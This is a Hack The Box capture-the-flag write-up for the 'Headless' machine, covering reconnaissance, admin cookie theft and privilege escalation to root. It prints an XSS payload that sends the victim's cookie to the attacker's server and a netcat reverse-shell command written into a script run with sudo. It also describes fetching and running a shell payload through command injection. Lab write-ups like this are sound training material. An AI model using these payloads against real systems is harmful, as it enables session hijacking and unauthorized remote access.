Headless Hack The Box (HTB) Write-Up
Today we are jumping into the Season 4 Easy Box — Headless
Headless was an interesting box… an nmap scan revealed a site running on port 5000. After enumerating the address with gobuster we found a dashboard for admins, but we could not access it. When we went back to the origional domain and used burpsuit we used an XXS vulnerability to reveal the admin cookie. Using the admin cookie we now have access to the url that gobuster found. From that site we modify a post request to give us a reverse shell. We then find user flag. We then escalate privileges by running a payload on a file and are gain a root shell. From there we find the root flag. Lets jump into the specifics
Reconnaissance
nmap scan:
We add headless to etc/hosts with the corresponding ip address given. Then navigate to http://{ip}:{port} in our case http://headless.htb:5000 or http://10.10.11.8:5000. Then we do some simple navigating. On the “home page” we press “for questions” and we are brought to a support page.
I try putting in some regular input and nothing happens so before I go down a rabbit hole I start a gobuster directory enumeration to see if there are any other hidden directories we can access.
Directory Enumeration
We find /dashboard so we go check that out
hmm so to access /dashboard we need to either be logged in a user with elevated privileges (admin) (but I don’t see a login page) or we need to trick the server that we are authorized to access the url. When I think about tricking the server I think about giving it either a admin cookie or an admin session id. For more info on the difference visit here.
Initial Exploit
I look online for how we can steal cookies using XSS and find this page where I see the following:
I head back to the /support page in Burp Suite where I can play around with modifying the requests that we are sending to the server with the payload we found above. Make sure that you replace the IP address with your own ip address. You can find that by running “ifconfig” in you CLI. Also ensure that following your IP address you input :{port} with whatever port you open you server up on.
First I start up my python server on port 8001
python3 -m http.server 8001Then I capture the request in Burp
To do this you need to open up Burp and then a burp browser and head to the /support page. From there you want to turn intercept on in burp suit, fill out some random fields and press submit. Burp will catch the request. Right click on the burp screen and press “send to repeater” so we will enable to try multiple things without having to recatch the page. One we are there we get our payload ready. In my case:
<script>var i=new Image(); i.src="http://10.10.14.208:8001/?cookie="+btoa(document.cookie);</script>We try putting this in different “fields” until our server picks something up.
After setting the User-Agent field to the payload my server picked up the cookie. The medium article lets us know that this cookie is base64 encoded .Lets decode the cookie:
echo "aXNfYWRtaW49SW1Ga2JXbHVJZy5kbXpEa1pORW02Q0swb3lMMWZiTS1TblhwSDA=" | base64 -d
Now that we have the cookie we were looking for we can head back to /dashboard and do the same thing in Burp Suite, but insert a “Cookie” field in the request we are modifying. Here’s the step by step for that.
- Head to http://headless.htb:5000/dashboard in your burp browser (Turn intercept off in burp)
- Turn intercept on in burp
- Refresh the http://headless.htb:5000/dashboard page
- In the proxy tab insert Cookie: {cookie}
5. Press “forward:
From here we need to assess what options we have. It looks like the date field takes user input which is where I usually like to look. Now that we are behind a protected page can we try getting a shell? Lets give it a shot. I make a file named payload.sh with the following inside it.
The ip address should be your ip address and the /1111 are the port I’m going to open up my netcat listener on.
Ensure that you did not close the server that you started (in my case on port 8001) we will need that to get to our payload file. Also make sure your server is running in the same directory as your payload file.
Back on /dashboard press “Generate Report” and catch it on Burp. We want to insert a command that will fetch the payload file we created and run it. Make sure that you have your admin cookie listed in the cookie field.
Boom we are in the shell with user dvir. Doing some basic discovery we find the user flag:
Root Flag
First thing I think of doing is looking to see what privileges the user I'm logged into has. I run “sudo -l” to do this
It looks like we have access to /usr/bin/syscheck. Lets take a closer look by catting out the contents.
We see that the file initdb.sh is being launched, so what we can do is put a payload in that file.
echo "nc -e /bin/sh 10.10.14.208 1212" > initdb.sh
chmod +x initdb.shEcho prints the payload that follows which is a reverse shell payload into initdb.sh. It will either create or override the file. The next lines makes the file executable.
Next you want to open up your listener on whatever port you indicated in your payload. In my case 1212 and then you want to run the following and you will see you nc listener return something.
It looks like the shell isn't stable so I’m going to stabilize it with these instructions. After performing those commands we can see that we are logged into root and we can confirm it with ‘whoami’
cd .. back to find the root directory where you can find the flag.
Cheers everyone, Happy Hacking,
Techno
